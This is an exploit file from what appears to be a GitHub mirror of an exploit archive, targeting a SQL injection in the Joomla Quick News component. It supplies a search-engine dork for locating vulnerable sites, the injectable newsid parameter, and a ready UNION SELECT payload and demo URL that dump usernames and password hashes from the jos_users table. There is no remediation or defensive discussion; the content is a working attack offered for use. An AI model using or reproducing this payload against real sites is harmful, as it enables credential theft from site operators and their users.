forked from 1979139113/0day-today-exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path10048.txt
32 lines (19 loc) · 1.19 KB
/
10048.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
Joomla Component Quick News SQL Injection Vulnerability
=======================================================
**************************************************************************/
[ Software Information ]
[+] Download : http://joomlacode.org/gf/project/quicknews/
[+] Developer Info : Bhavesh Chauhan
[+] Description : Get The Quick News On the Joomla Interface.
[+] Development Status: 1 - Planning
[+] License: GNU General Public License (GPL)
[+] Vulnerability : SQL injection
[+] Dork : intitle:"kaMtiEz"+"tukulesto"
===========================================================================
[ Here we go.. Proof of Concept ]
http://server/index.php?option=com_quicknews&task=view_item&newsid=[INDONESIANCODER]
[ Exploit ]
33/**/union/**/select/**/1,1,1,1,concat%28username,0x3a,password%29,666,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2/**/from/**/jos_users/*
[ D3M0 ]
http://server/index.php?option=com_quicknews&task=view_item&newsid=33/**/union/**/select/**/1,1,1,1,concat%28username,0x3a,password%29,666,1,1,1,1,1,1,1,1,1,1,1,1,1,2,2,2,2,2,2,2,2,2/**/from/**/jos_users/*
===========================================================================